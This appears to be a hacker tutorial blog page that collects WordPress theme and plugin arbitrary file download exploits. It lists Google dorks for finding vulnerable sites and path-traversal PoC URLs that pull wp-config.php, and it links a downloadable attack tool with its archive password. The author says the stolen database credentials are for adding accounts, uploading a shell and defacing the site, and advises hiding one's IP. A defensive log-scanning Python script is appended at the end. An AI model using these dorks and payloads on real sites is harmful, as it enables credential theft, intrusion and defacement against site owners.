
Exploit Theme ypo-theme Vulnerability Wordpress Site


Hello everyone. Today I want to show you a new WordPress theme vulnerability exploit.

If you already know how to use it to exploit, go ahead; if you are a newbie, check my Basic Exploit video in my tutorials first. Subscribe to my YouTube channel and like my page to get more vulnerabilities for CMSs such as WordPress, Joomla, Drupal and more.

##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################


Thanks for visiting. I hope to see you soon.

Exploiter Config Download Tool Wordpress Vulnerability


Hello friends. Today I will show you how to use the Exploiter Config Download tool. It is an old tool but it still works very well, so I hope you enjoy my website and YouTube channel.
I hope you will be careful.

Google dorks for Revslider (when you watch my video you will know about them):


inurl:wp-content/plugins/revslider/

inurl:revslider

inurl:revslider_admin.php

inurl:revslider_front.php

inurl:plugins/revslider/

intext:Powered by Revslider

intitle:"Index Of/ revslider"

intitle:"Index Of/wp-content/themes/revslider"

intitle:"Index Of/wp-content/plugins/revslider"

intitle:"Index Of/admin/revslider"

intitle:"Index Of/fr/revslider"

intitle:"Index Of/en/revslider"

intitle:"Index Of/us/revslider"

intitle:"Index Of/ar/revslider"

intitle:"Index Of/es/revslider"

intitle:"Index Of/de/revslider"


Now download the tool: Here

WinRAR password: dedsectool

I hope you can accept my English skill!!





 

WordPress Themes admin-ajax.php - Arbitrary File Download


Hello everyone. This is a good exploit. It is an old vulnerability but it still works very well.
What can you get? Through the download vulnerability you can get the MySQL account, and then you can connect or log in to MySQL.
Once you log in successfully you can do things like add a new WordPress account, upload a shell, and deface the target website.


# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/


PoC:

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php






Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download



EXPLOIT : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Note: when you pentest a website, you should hide your IP to protect yourself!


Use a dork to help you find vulnerable sites. Just paste this into Google or another search engine: inurl:/wp-content/plugins/hb-audio-gallery-lite

Pic 1


For example, I test this site URL to see whether it is vulnerable or not. If it is, it will show you something like Pic 4 and you will get wp-config.php.
Pic 2

PoC: www.victimsite.com/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Pic 3

When the PoC is pasted like this, you will get wp-config.php.
Pic 4


Then open it with Notepad and you will get the MySQL account. The next tutorial will show you how to connect.


Sorry about my English, but I hope you guys understand. If you don't understand, comment below. Thanks <3
Good luck, my brothers and sisters!



BY : dedsectool
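
For defenders: the three request shapes shown in the posts above (the `download`, `img` and `file_path` parameters carrying `../` sequences toward wp-config.php) leave a clear trace in web-server access logs. The following is an added example, not code from the original page or its author; it assumes a combined-format access log, its sample log lines and IP addresses are constructed, and it generalizes from the three endpoints to any query parameter, including double-encoded values.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jul/2016:10:01:02 +0000] "GET /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "curl/7.47"
203.0.113.7 - - [25/Jul/2016:10:01:09 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.47"
198.51.100.4 - - [25/Jul/2016:10:02:00 +0000] "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=%252e%252e%252fwp-config.php&file_size=10 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Jul/2016:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Jul/2016:10:03:05 +0000] "GET /wp-content/themes/ypo-theme/download.php?download=brochure.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ".." path segment

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding such as %252e -> %2e -> '.'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_params(target):
    """Names of query parameters that traverse directories or name wp-config.php."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value).lower()
        if TRAVERSAL_RE.search(value) or "wp-config.php" in value:
            hits.append(name)
    return hits

def scan(log_text):
    """One finding per flagged request; 'served' means a 2xx reply with a body."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        params = suspicious_params(target)
        if params:
            served = status.startswith("2") and size not in ("-", "0")
            findings.append({"ip": ip, "path": urlsplit(target).path,
                             "params": params, "status": int(status), "served": served})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true means the server answered with a body, so the database credentials and salts in wp-config.php should be treated as exposed and rotated after the vulnerable theme or plugin is removed or patched.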